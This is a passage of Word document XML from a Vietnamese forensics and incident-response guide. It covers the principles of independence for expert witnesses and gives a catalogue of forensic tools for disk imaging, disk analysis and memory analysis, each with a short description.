        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AA8C72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Phải giải thích được nền tảng của mọi kết luận, không dựa vào “hộp đen”.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B4F90AC">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388BB37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Thẩm vấn chéo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35631D7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Sẵn sàng để phương pháp bị chất vấn và hiểu giới hạn công cụ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D4E9FD4">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51D6178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Phạm vi chuyên môn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FA2104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Chỉ đưa ý kiến trong lĩnh vực có năng lực, không suy đoán ngoài chuyên môn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34A2D1ED">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Cân nhắc pháp lý:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nhân chứng chuyên gia phải độc lập nghiêm ngặt. Báo cáo phải giống nhau dù được yêu cầu bởi bên công tố, bào chữa, nguyên đơn hay bị đơn. Điều chỉnh ý kiến để có lợi cho bên thuê có thể dẫn đến mất tư cách nghề nghiệp và hậu quả pháp lý.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkEnd w:id="72"/>
    <w:p w14:paraId="225BA043">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="danh-mục-công-cụ-dfir"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15. Danh mục công cụ DFIR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0B11B">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Các công cụ thiết yếu, chức năng và tình huống sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CADFB53">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="thu-thập-và-tạo-ảnh"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15.1. Thu thập và tạo ảnh</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2350"/>
        <w:gridCol w:w="7696"/>
      </w:tblGrid>
      <w:tr w14:paraId="58A1AAE6">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7BB56B1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Công cụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="375D7C7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Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5E2EE90E">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68BA340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FTK Imager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="693BDB8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GUI/CLI trên Windows; tạo ảnh E01, DD, AFF và xác minh hash.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="51722D68">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44985B28">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dcfldd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="694B010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 xml:space="preserve">Phiên bản </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>dd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> tăng cường có MD5/SHA-256 tích hợp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="435A5094">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9B70C41">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ewfacquire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E7FA77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Tạo ảnh E01 trên Linux, thuộc gói libewf.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="243B6D6B">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741574B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WinPmem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="201A647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Thu thập RAM Windows, miễn phí, xuất RAW.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E6702A8">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382045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LiME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2657D98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Linux Memory Extractor dạng kernel module, phù hợp hệ thống Linux đang chạy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53C52615">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03DF241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Magnet RAM Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64572D4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GUI thu thập RAM Windows, thao tác nhanh tại hiện trường.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="37F73573">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6EE14E7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Cellebrite UFED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54C831A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Thu thập thiết bị di động, chuẩn thương mại cho physical extraction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="74"/>
    </w:tbl>
    <w:p w14:paraId="5496BE66">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="phân-tích-ổ-đĩa"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15.2. Phân tích ổ đĩa</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2433"/>
        <w:gridCol w:w="7613"/>
      </w:tblGrid>
      <w:tr w14:paraId="6339C2AA">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66E4232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Công cụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BBC736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Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3BE1EF4E">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7053DBC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Autopsy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36B141B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GUI miễn phí: hệ thống tệp, từ khóa, timeline, carving và phân tích artefact.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B76E7D4">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0293351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X-Ways Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="192E5F1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Thương mại, nhanh, gọn, hex editor mạnh và xử lý nhiều vụ việc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6E4F63D6">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6826514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The Sleuth Kit - TSK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2000DA1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 xml:space="preserve">Bộ CLI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>mmls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>fls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>icat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>fsstat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>blkls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> cho phân tích mức thấp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6CBD5607">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051D4FF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FTK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A6F2F7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Lập chỉ mục toàn văn, giải mã và quản lý vụ việc doanh nghiệp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3D191FB2">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4626170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Eric Zimmerman Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53292E7C">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MFTECmd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>PECmd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>LECmd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>RECmd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>AppCompatCacheParser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> và nhiều parser Windows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="35720C0A">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707C800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Foremost/Scalpel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24082AF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File carving từ vùng chưa cấp phát trên Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4EF382E9">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6A94454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PhotoRec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="583C32E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Phục hồi/carving đa nền tảng, hỗ trợ hàng trăm loại tệp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="75"/>
    </w:tbl>
    <w:p w14:paraId="45C74BC3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="phân-tích-bộ-nhớ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>15.3. Phân tích bộ nhớ</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1697"/>
        <w:gridCol w:w="8349"/>
      </w:tblGrid>
      <w:tr w14:paraId="189A5B93">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3E4338F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Công cụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F1EC93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Công dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="409546A3">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8B172B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Volatility 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A21AEF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Framework Python với nhiều plugin cho tiến trình, injection, mã độc, Registry và mạng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1EB330DF">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742DDD5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Volatility 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56CE7E6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Bản cũ; vẫn hữu ích với ảnh bộ nhớ cũ hoặc plugin chưa chuyển sang v3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5FBB9047">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6BC876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Rekall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5461EC2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Fork của Volatility do Google phát triển; có một số plugin riêng nhưng ít được duy trì hơn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="55A48241">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7523873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MemProcFS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68A331E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Mount memory dump thành hệ thống tệp/ổ đĩa ảo, tốc độ cao.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5FE92C10">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1A1C63DC">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>bulk_extractor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
